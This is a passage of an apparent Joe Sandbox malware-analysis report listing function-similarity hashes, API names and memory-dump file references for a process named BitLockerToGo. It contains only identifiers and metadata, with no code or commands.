                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: f4fc7cec2203445dc4199c26d340cc904b90764a1c7aa8c0a7aeee251b5545c6
                                                                              • Instruction ID: c368072f054f1c38245d297833e7c5b2769b0247d7fe650d2560136531fc9b69
                                                                              • Opcode Fuzzy Hash: f4fc7cec2203445dc4199c26d340cc904b90764a1c7aa8c0a7aeee251b5545c6
                                                                              • Instruction Fuzzy Hash: 13215A71B187604BC719DE3988D112FFBD39BCA210B0DD97EC8A69B3D5C934D9068758
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 30ef090ff568d0f0629f2c2f472fb4513c6e6329c292534b8928eab2378c7ed2
                                                                              • Instruction ID: 24796e764f8fcaf7bc4874ccf6ea1a95b00b571a0543a0c21330b55406ca53cb
                                                                              • Opcode Fuzzy Hash: 30ef090ff568d0f0629f2c2f472fb4513c6e6329c292534b8928eab2378c7ed2
                                                                              • Instruction Fuzzy Hash: F631D3728093108BD710DF28D84476BB7E4FB96314F19892ED889AB201D335EC05CBD6
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 156d155433e1dc68d748ce8a843954fd2ce1e707b49fe4b1efb67903aa61495d
                                                                              • Instruction ID: 5065469fe056952ffa1b2e3d862cc15b994dff28ceb37b945b43f31e5e32e5ce
                                                                              • Opcode Fuzzy Hash: 156d155433e1dc68d748ce8a843954fd2ce1e707b49fe4b1efb67903aa61495d
                                                                              • Instruction Fuzzy Hash: 8431B53260C7144BC3156D7D48A012FB692ABC6734F398B3EEAB64B3C1DA759C459386
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 1796be06319e4bd2875c215c75fbf2a9d505f152efbba258041335944f07a3a5
                                                                              • Instruction ID: 7c234e2af7335f3d5b51cdd0708f381f45857e1c5e32d9ecd7e27f98a3d32f21
                                                                              • Opcode Fuzzy Hash: 1796be06319e4bd2875c215c75fbf2a9d505f152efbba258041335944f07a3a5
                                                                              • Instruction Fuzzy Hash: A7115976A042105BE320EE199C80A3F7363EBD5304F1E897AC8896B308C7369C00C3D5
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                              • Instruction ID: a2c338323423a56a7cca65fec5c841f1e46a57019393e46809603948df37ae3c
                                                                              • Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
                                                                              • Instruction Fuzzy Hash: 2611E933A091D40EC3169D3C8450569BFA30A93A36F5D479AF4B49B2D3D62B8E8B8359
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 56e5d6b3793abb73240840821285b064188180bf58488734fa1c4e5c3ac1201e
                                                                              • Instruction ID: 6dfc54fb67c2ba4a4e24cef60371cbe9b8b22e9c2662a34bed759a9b5f7b3744
                                                                              • Opcode Fuzzy Hash: 56e5d6b3793abb73240840821285b064188180bf58488734fa1c4e5c3ac1201e
                                                                              • Instruction Fuzzy Hash: 9601B1F160030187D7209E16A4D0B67B2B8BF81B08F09842EE80D77342EF79FC08C2A9
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 46a7aa64eb7c117f55bf52c6863755b6ed465b284fdf4d9a65877e2a33061b9b
                                                                              • Instruction ID: b4a54d4059e5bb49432b0896917bace347a605edf444c8cd4ac279b5863896fe
                                                                              • Opcode Fuzzy Hash: 46a7aa64eb7c117f55bf52c6863755b6ed465b284fdf4d9a65877e2a33061b9b
                                                                              • Instruction Fuzzy Hash: 0E014C306883426BD300DF59DC8296BB6A9FBD2244F588C3DF459E7251DA389504475A
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: ec37f516d960b70597dcf51fd4ea35f048c0d2e6d90660047f024287c1b12cb4
                                                                              • Instruction ID: 76af720ec70683c09ec7cd6a396330be75db1bb798ae56fcca3381e2cedbac5c
                                                                              • Opcode Fuzzy Hash: ec37f516d960b70597dcf51fd4ea35f048c0d2e6d90660047f024287c1b12cb4
                                                                              • Instruction Fuzzy Hash: 86A011A2C880808A80008E02A802832E338022B20AF00303AE80AB3203EA28E008820E
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: MetricsSystem
                                                                              • String ID:
                                                                              • API String ID: 4116985748-3916222277
                                                                              • Opcode ID: 5525acaaedca2cb763bf8930612d9b39fbf2ff9e83493caeb4aa2b402a6bf3fd
                                                                              • Instruction ID: dce49044dad9cd1b6808bc58eff24b154cde99854fcf7fd71ef0447e6981f106
                                                                              • Opcode Fuzzy Hash: 5525acaaedca2cb763bf8930612d9b39fbf2ff9e83493caeb4aa2b402a6bf3fd
                                                                              • Instruction Fuzzy Hash: 64315EB09183049FDB40EFA9DA8565EBBF4BF88304F11453EE498DB360D774A948CB96
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2592473041.0000000000451000.00000020.00000400.00020000.00000000.sdmp, Offset: 00450000, based on PE: true
                                                                              • Associated: 00000005.00000002.2592455981.0000000000450000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592504910.000000000048F000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592523301.0000000000492000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                              • Associated: 00000005.00000002.2592544020.00000000004A3000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_450000_BitLockerToGo.jbxd
                                                                              Similarity
                                                                              • API ID: FreeString
                                                                              • String ID: YI
                                                                              • API String ID: 3341692771-631246294
                                                                              • Opcode ID: dc23c2178c79c7a2ad3d8c0b4f10990438281c4c598d5fdaba850d06c1df8607
                                                                              • Instruction ID: 1ad1ea44ba1e9a140b9fbbacb19ece1b1280aeed631b19f2cf2ab08352cb3e3c
                                                                              • Opcode Fuzzy Hash: dc23c2178c79c7a2ad3d8c0b4f10990438281c4c598d5fdaba850d06c1df8607
                                                                              • Instruction Fuzzy Hash: 63F0C7F0009A808BE722EF30C981585BBE0AF11314F1A09BECCCA8B202DA756845CB02